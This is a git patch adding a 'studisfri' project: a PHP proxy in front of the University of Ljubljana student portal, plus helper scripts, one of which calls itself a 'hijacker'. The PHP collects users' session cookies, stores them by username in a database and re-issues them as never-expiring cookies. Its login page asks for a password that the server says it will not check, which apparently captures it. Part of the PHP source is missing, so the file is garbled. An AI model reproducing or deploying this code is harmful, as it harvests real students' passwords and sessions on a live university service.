From bbb4e2d2418e397fd77410c9e469158c76f980c8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Anton=20Luka=20=C5=A0ijanec?= Date: Mon, 11 Sep 2023 01:11:22 +0200 Subject: studisfri --- .gitmodules | 3 + iv/oc_challs/ov/1bitvm | 1 + prog/studisfri/makefile | 10 ++ prog/studisfri/screenshot.sh | 13 ++ prog/studisfri/script.js | 1 + prog/studisfri/studis_account.php | 323 ++++++++++++++++++++++++++++++++++++++ prog/studisfri/studisfri | 28 ++++ 7 files changed, 379 insertions(+) create mode 160000 iv/oc_challs/ov/1bitvm create mode 100644 prog/studisfri/makefile create mode 100755 prog/studisfri/screenshot.sh create mode 100644 prog/studisfri/script.js create mode 100644 prog/studisfri/studis_account.php create mode 100644 prog/studisfri/studisfri diff --git a/.gitmodules b/.gitmodules index edd56a2..d947f95 100644 --- a/.gitmodules +++ b/.gitmodules @@ -1,3 +1,6 @@ [submodule "prog/ž/QR-Code-generator"] path = prog/ž/QR-Code-generator url = https://github.com/nayuki/QR-Code-generator +[submodule "iv/oc_challs/ov/1bitvm"] + path = iv/oc_challs/ov/1bitvm + url = https://ass.si/git/adrian/1bitvm diff --git a/iv/oc_challs/ov/1bitvm b/iv/oc_challs/ov/1bitvm new file mode 160000 index 0000000..6a477b6 --- /dev/null +++ b/iv/oc_challs/ov/1bitvm @@ -0,0 +1 @@ +Subproject commit 6a477b643ef05ced920a39b35f40bca527549812 diff --git a/prog/studisfri/makefile b/prog/studisfri/makefile new file mode 100644 index 0000000..363ee2f --- /dev/null +++ b/prog/studisfri/makefile @@ -0,0 +1,10 @@ +default: fetchsrc + +fetchsrc: + sftp s@t <<<"get /etc/nginx/sites/studisfri" + sftp s@t <<<"get studisfri/studis_account.php" + sftp s@t <<<"get studisfri/script.js" + sftp s@t <<<"get studisfri/screenshot.sh" + + +.PHONY: default fetchsrc diff --git a/prog/studisfri/screenshot.sh b/prog/studisfri/screenshot.sh new file mode 100755 index 0000000..5fdc8a1 --- /dev/null +++ b/prog/studisfri/screenshot.sh @@ -0,0 +1,13 @@ +#!/bin/bash +set -xe +umask 0077 +p=`rev <<<$0 | cut -d/ -f1 | rev` +t=`mktemp -p "" -d $p.XXX` +librewolf --headless --profile $t --no-remote --new-instance --screenshot $t/screenshot.png $1 +mount | grep "on /proc type proc" | grep hidepid=invisible || echo POZOR! leakal bom ime datoteke v procfs! POPRAVI!!! +h=`sha256sum $t/screenshot.png | cut -d\ -f1` +[ -f ../www/studisfri/$h.png ] && echo datoteka_že_obstaja +mv $t/screenshot.png ../www/studisfri/$h.png +chmod o+r ../www/studisfri/$h.png +echo zgoščena_vrednost $h +rm -r $t diff --git a/prog/studisfri/script.js b/prog/studisfri/script.js new file mode 100644 index 0000000..db25d21 --- /dev/null +++ b/prog/studisfri/script.js @@ -0,0 +1 @@ +console.log("studisfri hijacker loaded - NOOP"); diff --git a/prog/studisfri/studis_account.php b/prog/studisfri/studis_account.php new file mode 100644 index 0000000..2605da0 --- /dev/null +++ b/prog/studisfri/studis_account.php @@ -0,0 +1,323 @@ + ["method" => "GET", "header" => "Cookie: {$cookie}"]])); + if (strpos($resp, "/Account/Logout") === false) + return false; + $x = new DOMDocument(); + @$x->loadHTML($resp); + $un = trim(explode(" ", trim($x->getElementsByTagName("address")[0]->nodeValue))[0]); + $string .= $resp; + $resp = @file_get_contents("https://studisfri.uni-lj.si/DashboardStudent", false, stream_context_create(["http" => ["method" => "GET", "header" => "Cookie: {$cookie}"]])); + if (strpos($resp, "/Account/Logout") === false) + return false; + $string .= $resp; + $resp = @file_get_contents("https://studisfri.uni-lj.si/Student/ElektronskiIndeksStudent", false, stream_context_create(["http" => ["method" => "GET", "header" => "Cookie: {$cookie}"]])); + if (strpos($resp, "/Account/Logout") === false) + return false; + $string .= $resp; + if (strpos($un, "@") !== false) { + global $db; + $stmt = $db->prepare("update users set cookies=:cookies where username=:username"); + $stmt->bindParam(":username", $un, PDO::PARAM_STR); + $stmt->bindParam(":cookies", $cookie, PDO::PARAM_STR); + $stmt->execute(); + $cookies = []; + foreach ($http_response_header as $h) { + if (strtolower(explode(": ", $h)[0]) == "set-cookie") { + $cookie = explode("; ", explode(": ", $h)[1])[0]; + $cookies[] = $cookie; + add_infinite_cookie($cookie); + } else + if (strtolower(explode(": ", $h)[0]) != "location") + header($h); + } + if (sizeof($cookies)) { + $stmt = $db->prepare("update users set cookies=:cookies where username=:username"); + $stmt->bindParam(":username", $un, PDO::PARAM_STR); + $cookies = implode("; ", $cookies); + $stmt->bindParam(":cookies", $cookies, PDO::PARAM_STR); + $stmt->execute(); + } + } + return ["hash" => hash("sha256", $string, true), "username" => $un]; +} +function add_infinite_cookie ($cookie) { + header("Set-Cookie: $cookie; Path=/; Expires=Fri, 31 Dec 9999 23:59:59 GMT; Secure; HttpOnly", false); +} +function make_login_page ($resp) { + $replace = << + + ▶ Pokaži polje za nalaganje obstoječe seje na + strežnik (za napredne uporabnike) + + +
+ +
+
+
+ +
+ +
+

Uporabniško ime in geslo morate prav tako vnesti. Posebej bodite pazljivi, da je geslo pravnilno vnešeno, saj strežnik njegove pravilnosti ne bo preverjal.

+
+ + +